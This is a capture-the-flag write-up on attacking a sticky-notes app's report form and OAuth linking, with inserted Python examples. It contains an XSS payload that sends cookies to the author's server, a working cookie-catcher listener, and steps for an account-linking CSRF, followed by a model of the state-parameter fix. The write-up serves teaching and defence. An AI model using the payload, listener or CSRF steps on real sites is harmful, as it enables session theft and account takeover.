Note Surfer



A sticky notes app. Two features stand out right away: ‘Link with OAuth’ and ‘Report a problem’.

Checking out ‘Report a problem’ first. The form says that an admin will look into whatever you submit.


That got me thinking. If an admin (most likely a bot) opens every report, then whatever I submit gets rendered in the admin’s browser, and the report form becomes a delivery channel for client-side attacks against the admin’s session.

I fired up my VPS and started a small PHP server with a cookie.php endpoint to see if I could steal the admin’s cookies.

Reported this payload as a problem:

<img src=x onerror=document.location="http://REDACTED/cookie.php?c="+document.cookie>
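The listener side of that step, as an added example and not the cookie.php from the original post: a minimal Python HTTP server standing in for the PHP script. It answers any GET with an empty 200 so the victim’s browser sees nothing unusual, records the `c` parameter when it is present, and treats an empty `c=` (which is exactly what `document.cookie` produces when every cookie is HttpOnly) as nothing captured. The port and the `/cookie.php` path are assumptions for the example.

```python
"""Cookie catcher: receives /cookie.php?c=<document.cookie> from the XSS payload.

Added example (not the original post's PHP script). Run it on the VPS and point the
payload at http://<vps>:8000/cookie.php?c= ; captured values go to stderr and CAPTURED.
"""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

CAPTURED = []  # every non-empty cookie string received so far


def extract_cookie(path):
    """Return the 'c' query parameter of a request path, or None if absent/empty.

    parse_qs drops blank values by default, so '?c=' (what document.cookie yields
    when all cookies are HttpOnly) comes back as None rather than ''.
    """
    query = parse_qs(urlsplit(path).query)
    values = query.get("c")
    return values[0] if values else None


class CookieCatcher(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = extract_cookie(self.path)
        if cookie is not None:
            CAPTURED.append(cookie)
            print(f"[+] {self.client_address[0]} sent: {cookie}", file=sys.stderr)
        else:
            print(f"[-] {self.client_address[0]} hit {self.path} with no cookie "
                  "(HttpOnly cookies are invisible to document.cookie)", file=sys.stderr)
        # Empty 200 response: nothing for the victim to notice.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep stderr to our own [+]/[-] lines


def serve(port=8000):
    """Listen on all interfaces; assumed port, adjust to taste."""
    HTTPServer(("0.0.0.0", port), CookieCatcher).serve_forever()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 8000)
```

A hit with an empty `c` still tells you the payload executed in the admin’s browser, which is the useful signal here even though no cookie comes back.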


So stored XSS is in play (the admin’s browser did call back to my server), but the session cookie is set HttpOnly, so document.cookie comes back empty and there is nothing to steal. No dice there.

The title of the challenge is a big hint about what to do next:

Cross-Site Request Forgery, or CSRF (pronounced ‘sea surf’) for short.

I assumed it had something to do with the OAuth link feature, so I fired up Burp to capture the requests.


Forwarding the first request leaves us with the second: the callback to the sticky notes app that carries the ‘code’ parameter.


After some testing I noted that the ‘code’ value is single-use: once the callback completes, the code is spent. So I sent this request to Repeater and dropped it in the proxy, so my own session never consumed the code.

Right-click anywhere on the request in Repeater and choose ‘Copy URL’.

Back on the sticky notes app, we can report another problem containing the copied callback URL. The admin’s browser will follow it while logged in as admin.


Send that off. When the admin opens the link, the callback completes in the admin’s session and consumes our unused code, which links the admin’s sticky notes account to our OAuth identity. Logging into our OAuth account afterwards, we can see that we’re now connected to the admin sticky notes account. The root cause is that the link callback is never tied to the session that started the flow; an OAuth ‘state’ value bound to the initiating session would have rejected the admin’s visit.
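The whole account-linking CSRF, modelled end to end as an added example (this is not the challenge’s code; the provider, the notes app, the session ids and the OAuth identity names are all hypothetical). It replays the steps above twice: once against an app that links whatever code arrives in whatever session opens the callback, which is the behaviour exploited here, and once against the same app checking an OAuth ‘state’ value bound to the session that clicked ‘Link with OAuth’. The one-use code is modelled with a pop() so the attacker has to drop the callback exactly as described.

```python
"""Toy model of the OAuth account-linking CSRF from the writeup.

Added example, not the challenge's code. Everything here is hypothetical: the
provider, the app, the session ids and the OAuth identity names.
"""
import secrets


class OAuthProvider:
    """Issues single-use authorization codes and exchanges them for an identity."""

    def __init__(self):
        self._codes = {}  # code -> OAuth identity that authorized it

    def authorize(self, oauth_identity):
        code = secrets.token_hex(8)
        self._codes[code] = oauth_identity
        return code

    def exchange(self, code):
        # pop() makes the code one-use, matching what the writeup observed
        return self._codes.pop(code, None)


class NotesApp:
    """Sticky notes app with a 'Link with OAuth' feature."""

    def __init__(self, provider, check_state):
        self.provider = provider
        self.check_state = check_state  # False = vulnerable, True = hardened
        self.sessions = {}  # session id -> {"user": ..., "oauth_state": ...}
        self.links = {}  # OAuth identity -> app user it is linked to

    def login(self, session_id, user):
        self.sessions[session_id] = {"user": user}

    def start_link(self, session_id):
        """User clicks 'Link with OAuth': mint a state value bound to this session."""
        state = secrets.token_urlsafe(16)
        self.sessions[session_id]["oauth_state"] = state
        return state

    def link_callback(self, session_id, code, state=None):
        """The callback URL (?code=...&state=...) opened in the given session."""
        sess = self.sessions[session_id]
        if self.check_state:
            expected = sess.pop("oauth_state", None)
            if expected is None or not secrets.compare_digest(expected, state or ""):
                return False  # this session never started a link flow: reject
        identity = self.provider.exchange(code)
        if identity is None:
            return False  # unknown or already-used code
        self.links[identity] = sess["user"]
        return True

    def oauth_login(self, oauth_identity):
        """Log in via OAuth: which app account is this identity linked to?"""
        return self.links.get(oauth_identity)


def run_attack(check_state):
    """Replay the writeup; returns the app account the attacker's OAuth login lands in."""
    provider = OAuthProvider()
    app = NotesApp(provider, check_state)
    app.login("attacker-session", "attacker")
    app.login("admin-session", "admin")

    # Attacker starts the link flow in their own browser and authorizes at the
    # provider, but drops the callback in the proxy so the code stays unused.
    attacker_state = app.start_link("attacker-session")
    code = provider.authorize("attacker@oauth.example")

    # The copied callback URL is reported; the admin's browser follows it while
    # logged in as admin, so the callback runs in the admin's session.
    app.link_callback("admin-session", code, attacker_state)

    return app.oauth_login("attacker@oauth.example")


def run_legitimate_link(check_state):
    """A normal link in the user's own session still works under either rule."""
    provider = OAuthProvider()
    app = NotesApp(provider, check_state)
    app.login("alice-session", "alice")
    state = app.start_link("alice-session")
    code = provider.authorize("alice@oauth.example")
    app.link_callback("alice-session", code, state)
    return app.oauth_login("alice@oauth.example")


if __name__ == "__main__":
    print("vulnerable app, attacker logs in as:", run_attack(check_state=False))
    print("hardened app, attacker logs in as:", run_attack(check_state=True))
    print("hardened app, legitimate link lands in:", run_legitimate_link(check_state=True))
```

The state check rejects the admin’s visit because the admin session never started a link flow, so there is no stored value for the URL’s state to match; the attacker cannot supply a matching one because it lives server-side in the admin’s session.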
